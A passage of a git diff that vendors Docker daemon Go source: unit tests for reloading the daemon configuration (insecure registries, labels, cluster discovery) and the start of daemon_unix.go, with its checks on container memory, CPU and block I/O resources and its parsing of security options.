+		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
+	}
+}
+
+func TestDaemonReloadInsecureRegistries(t *testing.T) {
+	daemon := &Daemon{}
+	// initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000"
+	daemon.RegistryService = registry.NewService(registry.ServiceOptions{
+		InsecureRegistries: []string{
+			"127.0.0.0/8",
+			"10.10.1.11:5000",
+			"10.10.1.22:5000", // this will be removed when reloading
+			"docker1.com",
+			"docker2.com", // this will be removed when reloading
+		},
+	})
+
+	daemon.configStore = &Config{}
+
+	insecureRegistries := []string{
+		"127.0.0.0/8",     // this will be kept
+		"10.10.1.11:5000", // this will be kept
+		"10.10.1.33:5000", // this will be newly added
+		"docker1.com",     // this will be kept
+		"docker3.com",     // this will be newly added
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["insecure-registries"] = insecureRegistries
+
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			ServiceOptions: registry.ServiceOptions{
+				InsecureRegistries: insecureRegistries,
+			},
+			valuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	// After Reload, daemon.RegistryService will be changed which is useful
+	// for registry communication in daemon.
+	registries := daemon.RegistryService.ServiceConfig()
+
+	// After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon.
+	// Then collect registries.InsecureRegistryCIDRs in dataMap.
+	// When collecting, we need to convert CIDRS into string as a key,
+	// while the times of key appears as value.
+	dataMap := map[string]int{}
+	for _, value := range registries.InsecureRegistryCIDRs {
+		if _, ok := dataMap[value.String()]; !ok {
+			dataMap[value.String()] = 1
+		} else {
+			dataMap[value.String()]++
+		}
+	}
+
+	for _, value := range registries.IndexConfigs {
+		if _, ok := dataMap[value.Name]; !ok {
+			dataMap[value.Name] = 1
+		} else {
+			dataMap[value.Name]++
+		}
+	}
+
+	// Finally compare dataMap with the original insecureRegistries.
+	// Each value in insecureRegistries should appear in daemon's insecure registries,
+	// and each can only appear exactly ONCE.
+	for _, r := range insecureRegistries {
+		if value, ok := dataMap[r]; !ok {
+			t.Fatalf("Expected daemon insecure registry %s, got none", r)
+		} else if value != 1 {
+			t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value)
+		}
+	}
+
+	// assert if "10.10.1.22:5000" is removed when reloading
+	if value, ok := dataMap["10.10.1.22:5000"]; ok {
+		t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value)
+	}
+
+	// assert if "docker2.com" is removed when reloading
+	if value, ok := dataMap["docker2.com"]; ok {
+		t.Fatalf("Expected no insecure registry of docker2.com, got %d", value)
+	}
+}
+
+func TestDaemonReloadNotAffectOthers(t *testing.T) {
+	daemon := &Daemon{}
+	daemon.configStore = &Config{
+		CommonConfig: CommonConfig{
+			Labels: []string{"foo:bar"},
+			Debug:  true,
+		},
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["labels"] = "foo:baz"
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			Labels:    []string{"foo:baz"},
+			valuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	label := daemon.configStore.Labels[0]
+	if label != "foo:baz" {
+		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
+	}
+	debug := daemon.configStore.Debug
+	if !debug {
+		t.Fatalf("Expected debug 'enabled', got 'disabled'")
+	}
+}
+
+func TestDaemonDiscoveryReload(t *testing.T) {
+	daemon := &Daemon{}
+	daemon.configStore = &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     "memory://127.0.0.1",
+			ClusterAdvertise: "127.0.0.1:3333",
+		},
+	}
+
+	if err := daemon.initDiscovery(daemon.configStore); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "3333"},
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["cluster-store"] = "memory://127.0.0.1:2222"
+	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     "memory://127.0.0.1:2222",
+			ClusterAdvertise: "127.0.0.1:5555",
+			valuesSet:        valuesSets,
+		},
+	}
+
+	expected = discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	ch, errCh = daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+}
+
+func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) {
+	daemon := &Daemon{}
+	daemon.configStore = &Config{}
+
+	valuesSet := make(map[string]interface{})
+	valuesSet["cluster-store"] = "memory://127.0.0.1:2222"
+	valuesSet["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     "memory://127.0.0.1:2222",
+			ClusterAdvertise: "127.0.0.1:5555",
+			valuesSet:        valuesSet,
+		},
+	}
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+}
+
+func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) {
+	daemon := &Daemon{}
+	daemon.configStore = &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore: "memory://127.0.0.1",
+		},
+	}
+	valuesSets := make(map[string]interface{})
+	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			ClusterAdvertise: "127.0.0.1:5555",
+			valuesSet:        valuesSets,
+		},
+	}
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-daemon.discoveryWatcher.ReadyCh():
+	case <-time.After(10 * time.Second):
+		t.Fatal("Timeout waiting for discovery")
+	}
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go
new file mode 100644
index 0000000000..5b3ffeb72d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go
@@ -0,0 +1,1237 @@
+// +build linux freebsd
+
+package daemon
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net"
+	"os"
+	"path/filepath"
+	"runtime"
+	"runtime/debug"
+	"strconv"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/blkiodev"
+	pblkiodev "github.com/docker/docker/api/types/blkiodev"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/runconfig"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/libnetwork"
+	nwconfig "github.com/docker/libnetwork/config"
+	"github.com/docker/libnetwork/drivers/bridge"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/netutils"
+	"github.com/docker/libnetwork/options"
+	lntypes "github.com/docker/libnetwork/types"
+	"github.com/golang/protobuf/ptypes"
+	"github.com/opencontainers/runc/libcontainer/cgroups"
+	"github.com/opencontainers/runc/libcontainer/label"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/vishvananda/netlink"
+)
+
+const (
+	// See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269
+	linuxMinCPUShares = 2
+	linuxMaxCPUShares = 262144
+	platformSupported = true
+	// It's not kernel limit, we want this 4M limit to supply a reasonable functional container
+	linuxMinMemory = 4194304
+	// constants for remapped root settings
+	defaultIDSpecifier string = "default"
+	defaultRemappedID  string = "dockremap"
+
+	// constant for cgroup drivers
+	cgroupFsDriver      = "cgroupfs"
+	cgroupSystemdDriver = "systemd"
+)
+
+func getMemoryResources(config containertypes.Resources) *specs.Memory {
+	memory := specs.Memory{}
+
+	if config.Memory > 0 {
+		limit := uint64(config.Memory)
+		memory.Limit = &limit
+	}
+
+	if config.MemoryReservation > 0 {
+		reservation := uint64(config.MemoryReservation)
+		memory.Reservation = &reservation
+	}
+
+	if config.MemorySwap != 0 {
+		swap := uint64(config.MemorySwap)
+		memory.Swap = &swap
+	}
+
+	if config.MemorySwappiness != nil {
+		swappiness := uint64(*config.MemorySwappiness)
+		memory.Swappiness = &swappiness
+	}
+
+	if config.KernelMemory != 0 {
+		kernelMemory := uint64(config.KernelMemory)
+		memory.Kernel = &kernelMemory
+	}
+
+	return &memory
+}
+
+func getCPUResources(config containertypes.Resources) *specs.CPU {
+	cpu := specs.CPU{}
+
+	if config.CPUShares != 0 {
+		shares := uint64(config.CPUShares)
+		cpu.Shares = &shares
+	}
+
+	if config.CpusetCpus != "" {
+		cpuset := config.CpusetCpus
+		cpu.Cpus = &cpuset
+	}
+
+	if config.CpusetMems != "" {
+		cpuset := config.CpusetMems
+		cpu.Mems = &cpuset
+	}
+
+	if config.NanoCPUs > 0 {
+		// https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt
+		period := uint64(100 * time.Millisecond / time.Microsecond)
+		quota := uint64(config.NanoCPUs) * period / 1e9
+		cpu.Period = &period
+		cpu.Quota = &quota
+	}
+
+	if config.CPUPeriod != 0 {
+		period := uint64(config.CPUPeriod)
+		cpu.Period = &period
+	}
+
+	if config.CPUQuota != 0 {
+		quota := uint64(config.CPUQuota)
+		cpu.Quota = &quota
+	}
+
+	if config.CPURealtimePeriod != 0 {
+		period := uint64(config.CPURealtimePeriod)
+		cpu.RealtimePeriod = &period
+	}
+
+	if config.CPURealtimeRuntime != 0 {
+		runtime := uint64(config.CPURealtimeRuntime)
+		cpu.RealtimeRuntime = &runtime
+	}
+
+	return &cpu
+}
+
+func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) {
+	var stat syscall.Stat_t
+	var blkioWeightDevices []specs.WeightDevice
+
+	for _, weightDevice := range config.BlkioWeightDevice {
+		if err := syscall.Stat(weightDevice.Path, &stat); err != nil {
+			return nil, err
+		}
+		weight := weightDevice.Weight
+		d := specs.WeightDevice{Weight: &weight}
+		d.Major = int64(stat.Rdev / 256)
+		d.Minor = int64(stat.Rdev % 256)
+		blkioWeightDevices = append(blkioWeightDevices, d)
+	}
+
+	return blkioWeightDevices, nil
+}
+
+func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
+	var (
+		labelOpts []string
+		err       error
+	)
+
+	for _, opt := range config.SecurityOpt {
+		if opt == "no-new-privileges" {
+			container.NoNewPrivileges = true
+			continue
+		}
+
+		var con []string
+		if strings.Contains(opt, "=") {
+			con = strings.SplitN(opt, "=", 2)
+		} else if strings.Contains(opt, ":") {
+			con = strings.SplitN(opt, ":", 2)
+			logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.")
+		}
+
+		if len(con) != 2 {
+			return fmt.Errorf("invalid --security-opt 1: %q", opt)
+		}
+
+		switch con[0] {
+		case "label":
+			labelOpts = append(labelOpts, con[1])
+		case "apparmor":
+			container.AppArmorProfile = con[1]
+		case "seccomp":
+			container.SeccompProfile = con[1]
+		default:
+			return fmt.Errorf("invalid --security-opt 2: %q", opt)
+		}
+	}
+
+	container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts)
+	return err
+}
+
+func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) {
+	var throttleDevices []specs.ThrottleDevice
+	var stat syscall.Stat_t
+
+	for _, d := range devs {
+		if err := syscall.Stat(d.Path, &stat); err != nil {
+			return nil, err
+		}
+		rate := d.Rate
+		d := specs.ThrottleDevice{Rate: &rate}
+		d.Major = int64(stat.Rdev / 256)
+		d.Minor = int64(stat.Rdev % 256)
+		throttleDevices = append(throttleDevices, d)
+	}
+
+	return throttleDevices, nil
+}
+
+func checkKernel() error {
+	// Check for unsupported kernel versions
+	// FIXME: it would be cleaner to not test for specific versions, but rather
+	// test for specific functionalities.
+	// Unfortunately we can't test for the feature "does not cause a kernel panic"
+	// without actually causing a kernel panic, so we need this workaround until
+	// the circumstances of pre-3.10 crashes are clearer.
+	// For details see https://github.com/docker/docker/issues/407
+	// Docker 1.11 and above doesn't actually run on kernels older than 3.4,
+	// due to containerd-shim usage of PR_SET_CHILD_SUBREAPER (introduced in 3.4).
+	if !kernel.CheckKernelVersion(3, 10, 0) {
+		v, _ := kernel.GetKernelVersion()
+		if os.Getenv("DOCKER_NOWARN_KERNEL_VERSION") == "" {
+			logrus.Fatalf("Your Linux kernel version %s is not supported for running docker. Please upgrade your kernel to 3.10.0 or newer.", v.String())
+		}
+	}
+	return nil
+}
+
+// adaptContainerSettings is called during container creation to modify any
+// settings necessary in the HostConfig structure.
+func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error {
+	if adjustCPUShares && hostConfig.CPUShares > 0 {
+		// Handle unsupported CPUShares
+		if hostConfig.CPUShares < linuxMinCPUShares {
+			logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, linuxMinCPUShares)
+			hostConfig.CPUShares = linuxMinCPUShares
+		} else if hostConfig.CPUShares > linuxMaxCPUShares {
+			logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, linuxMaxCPUShares)
+			hostConfig.CPUShares = linuxMaxCPUShares
+		}
+	}
+	if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 {
+		// By default, MemorySwap is set to twice the size of Memory.
+		hostConfig.MemorySwap = hostConfig.Memory * 2
+	}
+	if hostConfig.ShmSize == 0 {
+		hostConfig.ShmSize = container.DefaultSHMSize
+	}
+	var err error
+	opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged)
+	if err != nil {
+		return err
+	}
+	hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...)
+	if hostConfig.MemorySwappiness == nil {
+		defaultSwappiness := int64(-1)
+		hostConfig.MemorySwappiness = &defaultSwappiness
+	}
+	if hostConfig.OomKillDisable == nil {
+		defaultOomKillDisable := false
+		hostConfig.OomKillDisable = &defaultOomKillDisable
+	}
+
+	return nil
+}
+
+func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) {
+	warnings := []string{}
+
+	// memory subsystem checks and adjustments
+	if resources.Memory != 0 && resources.Memory < linuxMinMemory {
+		return warnings, fmt.Errorf("Minimum memory limit allowed is 4MB")
+	}
+	if resources.Memory > 0 && !sysInfo.MemoryLimit {
+		warnings = append(warnings, "Your kernel does not support memory limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		logrus.Warn("Your kernel does not support memory limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		resources.Memory = 0
+		resources.MemorySwap = -1
+	}
+	if resources.Memory > 0 && resources.MemorySwap != -1 && !sysInfo.SwapLimit {
+		warnings = append(warnings, "Your kernel does not support swap limit capabilities or the cgroup is not mounted. Memory limited without swap.")
+		logrus.Warn("Your kernel does not support swap limit capabilities,or the cgroup is not mounted. Memory limited without swap.")
+		resources.MemorySwap = -1
+	}
+	if resources.Memory > 0 && resources.MemorySwap > 0 && resources.MemorySwap < resources.Memory {
+		return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage")
+	}
+	if resources.Memory == 0 && resources.MemorySwap > 0 && !update {
+		return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage")
+	}
+	if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness {
+		warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.")
+		logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. Memory swappiness discarded.")
+		resources.MemorySwappiness = nil
+	}
+	if resources.MemorySwappiness != nil {
+		swappiness := *resources.MemorySwappiness
+		if swappiness < -1 || swappiness > 100 {
+			return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness)
+		}
+	}
+	if resources.MemoryReservation > 0 && !sysInfo.MemoryReservation {
+		warnings = append(warnings, "Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		logrus.Warn("Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		resources.MemoryReservation = 0
+	}
+	if resources.MemoryReservation > 0 && resources.MemoryReservation < linuxMinMemory {
+		return warnings, fmt.Errorf("Minimum memory reservation allowed is 4MB")
+	}
+	if resources.Memory > 0 && resources.MemoryReservation > 0 && resources.Memory < resources.MemoryReservation {
+		return warnings, fmt.Errorf("Minimum memory limit can not be less than memory reservation limit, see usage")
+	}
+	if resources.KernelMemory > 0 && !sysInfo.KernelMemory {
+		warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		logrus.Warn("Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.")
+		resources.KernelMemory = 0
+	}
+	if resources.KernelMemory > 0 && resources.KernelMemory < linuxMinMemory {
+		return warnings, fmt.Errorf("Minimum kernel memory limit allowed is 4MB")
+	}
+	if resources.KernelMemory > 0 && !kernel.CheckKernelVersion(4, 0, 0) {
+		warnings = append(warnings, "You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.")
+		logrus.Warn("You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.")
+	}
+	if resources.OomKillDisable != nil && !sysInfo.OomKillDisable {
+		// only produce warnings if the setting wasn't to *disable* the OOM Kill; no point
+		// warning the caller if they already wanted the feature to be off
+		if *resources.OomKillDisable {
+			warnings = append(warnings, "Your kernel does not support OomKillDisable. OomKillDisable discarded.")
+			logrus.Warn("Your kernel does not support OomKillDisable. OomKillDisable discarded.")
+		}
+		resources.OomKillDisable = nil
+	}
+
+	if resources.PidsLimit != 0 && !sysInfo.PidsLimit {
+		warnings = append(warnings, "Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.")
+		logrus.Warn("Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.")
+		resources.PidsLimit = 0
+	}
+
+	// cpu subsystem checks and adjustments
+	if resources.NanoCPUs > 0 && resources.CPUPeriod > 0 {
+		return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Period cannot both be set")
+	}
+	if resources.NanoCPUs > 0 && resources.CPUQuota > 0 {
+		return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Quota cannot both be set")
+	}
+	if resources.NanoCPUs > 0 && (!sysInfo.CPUCfsPeriod || !sysInfo.CPUCfsQuota) {
+		return warnings, fmt.Errorf("NanoCPUs can not be set, as your kernel does not support CPU cfs period/quota or the cgroup is not mounted")
+	}
+	// The highest precision we could get on Linux is 0.001, by setting
+	//   cpu.cfs_period_us=1000ms
+	//   cpu.cfs_quota=1ms
+	// See the following link for details:
+	// https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt
+	// Here we don't set the lower limit and it is up to the underlying platform (e.g., Linux) to return an error.
+	// The error message is 0.01 so that this is consistent with Windows
+	if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 {
+		return warnings, fmt.Errorf("Range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU())
+	}
+
+	if resources.CPUShares > 0 && !sysInfo.CPUShares {
+		warnings = append(warnings, "Your kernel does not support CPU shares or the cgroup is not mounted. Shares discarded.")
+		logrus.Warn("Your kernel does not support CPU shares or the cgroup is not mounted. Shares discarded.")
+		resources.CPUShares = 0
+	}
+	if resources.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod {
+		warnings = append(warnings, "Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.")
+		logrus.Warn("Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.")
+		resources.CPUPeriod = 0
+	}
+	if resources.CPUPeriod != 0 && (resources.CPUPeriod < 1000 || resources.CPUPeriod > 1000000) {
+		return warnings, fmt.Errorf("CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)")
+	}
+	if resources.CPUQuota > 0 && !sysInfo.CPUCfsQuota {
+		warnings = append(warnings, "Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.")
+		logrus.Warn("Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.")
+		resources.CPUQuota = 0
+	}
+	if resources.CPUQuota > 0 && resources.CPUQuota < 1000 {
+		return warnings, fmt.Errorf("CPU cfs quota can not be less than 1ms (i.e. 1000)")
+	}
+	if resources.CPUPercent > 0 {
+		warnings = append(warnings, fmt.Sprintf("%s does not support CPU percent. Percent discarded.", runtime.GOOS))
+		logrus.Warnf("%s does not support CPU percent. Percent discarded.", runtime.GOOS)
+		resources.CPUPercent = 0
+	}
+
+	// cpuset subsystem checks and adjustments
+	if (resources.CpusetCpus != "" || resources.CpusetMems != "") && !sysInfo.Cpuset {
+		warnings = append(warnings, "Your kernel does not support cpuset or the cgroup is not mounted. Cpuset discarded.")
+		logrus.Warn("Your kernel does not support cpuset or the cgroup is not mounted. Cpuset discarded.")
+		resources.CpusetCpus = ""
+		resources.CpusetMems = ""
+	}
+	cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(resources.CpusetCpus)
+	if err != nil {
+		return warnings, fmt.Errorf("Invalid value %s for cpuset cpus", resources.CpusetCpus)
+	}
+	if !cpusAvailable {
+		return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s", resources.CpusetCpus, sysInfo.Cpus)
+	}
+	memsAvailable, err := sysInfo.IsCpusetMemsAvailable(resources.CpusetMems)
+	if err != nil {
+		return warnings, fmt.Errorf("Invalid value %s for cpuset mems", resources.CpusetMems)
+	}
+	if !memsAvailable {
+		return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s", resources.CpusetMems, sysInfo.Mems)
+	}
+
+	// blkio subsystem checks and adjustments
+	if resources.BlkioWeight > 0 && !sysInfo.BlkioWeight {
+		warnings = append(warnings, "Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.")
+		logrus.Warn("Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.")
+		resources.BlkioWeight = 0
+	}
+	if resources.BlkioWeight > 0 && (resources.BlkioWeight < 10 || resources.BlkioWeight > 1000) {
+		return warnings, fmt.Errorf("Range of blkio weight is from 10 to 1000")
+	}
+	if resources.IOMaximumBandwidth != 0 || resources.IOMaximumIOps != 0 {
+		return warnings, fmt.Errorf("Invalid QoS settings: %s does not support Maximum IO Bandwidth or Maximum IO IOps", runtime.GOOS)
+	}
+	if len(resources.BlkioWeightDevice) > 0 && !sysInfo.BlkioWeightDevice {
+		warnings = append(warnings, "Your kernel does not support Block I/O weight_device or the cgroup is not mounted. Weight-device discarded.")
+		logrus.Warn("Your kernel does not support Block I/O weight_device or the cgroup is not mounted. Weight-device discarded.")
+		resources.BlkioWeightDevice = []*pblkiodev.WeightDevice{}
+	}
+	if len(resources.BlkioDeviceReadBps) > 0 && !sysInfo.BlkioReadBpsDevice {
+		warnings = append(warnings, "Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded.")
+		logrus.Warn("Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded")
+		resources.BlkioDeviceReadBps = []*pblkiodev.ThrottleDevice{}
+	}
+	if len(resources.BlkioDeviceWriteBps) > 0 && !sysInfo.BlkioWriteBpsDevice {
+		warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.")
+		logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.")
+		resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{}
+	}
+	if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice {
+		warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.")
+		logrus.Warn("Your kernel does not support IOPS Block I/O read limit in IO or the cgroup is not mounted. Block I/O IOPS read limit discarded.")
+		resources.BlkioDeviceReadIOps = []*pblkiodev.ThrottleDevice{}
+	}
+	if len(resources.BlkioDeviceWriteIOps) > 0 && !sysInfo.BlkioWriteIOpsDevice {
+		warnings = append(warnings, "Your kernel does not support IOPS Block write limit or the cgroup is not mounted. Block I/O IOPS write limit discarded.")
+		logrus.Warn("Your kernel does not support IOPS Block I/O write limit or the cgroup is not mounted. Block I/O IOPS write limit discarded.")
+		resources.BlkioDeviceWriteIOps = []*pblkiodev.ThrottleDevice{}
+	}
+
+	return warnings, nil
+}
+
+func (daemon *Daemon) getCgroupDriver() string {
+	cgroupDriver := cgroupFsDriver
+
+	if UsingSystemd(daemon.configStore) {
+		cgroupDriver = cgroupSystemdDriver
+	}
+	return cgroupDriver
+}
+
+// getCD gets the raw value of the native.cgroupdriver option, if set.
+func getCD(config *Config) string {
+	for _, option := range config.ExecOptions {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil || !strings.EqualFold(key, "native.cgroupdriver") {
+			continue
+		}
+		return val
+	}
+	return ""
+}
+
+// VerifyCgroupDriver validates native.cgroupdriver
+func VerifyCgroupDriver(config *Config) error {
+	cd := getCD(config)
+	if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver {
+		return nil
+	}
+	return fmt.Errorf("native.cgroupdriver option %s not supported", cd)
+}
+
+// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd
+func UsingSystemd(config *Config) bool {
+	return getCD(config) == cgroupSystemdDriver
+}
+
+// verifyPlatformContainerSettings performs platform-specific validation of the
+// hostconfig and config structures.
+func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
+	warnings := []string{}
+	sysInfo := sysinfo.New(true)
+
+	warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config)
+	if err != nil {
+		return warnings, err
+	}
+
+	w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update)
+
+	// no matter err is nil or not, w could have data in itself.
+	warnings = append(warnings, w...)
+
+	if err != nil {
+		return warnings, err
+	}
+
+	if hostConfig.ShmSize < 0 {
+		return warnings, fmt.Errorf("SHM size can not be less than 0")
+	}
+
+	if hostConfig.OomScoreAdj < -1000 || hostConfig.OomScoreAdj > 1000 {
+		return warnings, fmt.Errorf("Invalid value %d, range for oom score adj is [-1000, 1000]", hostConfig.OomScoreAdj)
+	}
+
+	// ip-forwarding does not affect container with '--net=host' (or '--net=none')
+	if sysInfo.IPv4ForwardingDisabled && !(hostConfig.NetworkMode.IsHost() || hostConfig.NetworkMode.IsNone()) {
+		warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.")
+		logrus.Warn("IPv4 forwarding is disabled. Networking will not work")
+	}
+	// check for various conflicting options with user namespaces
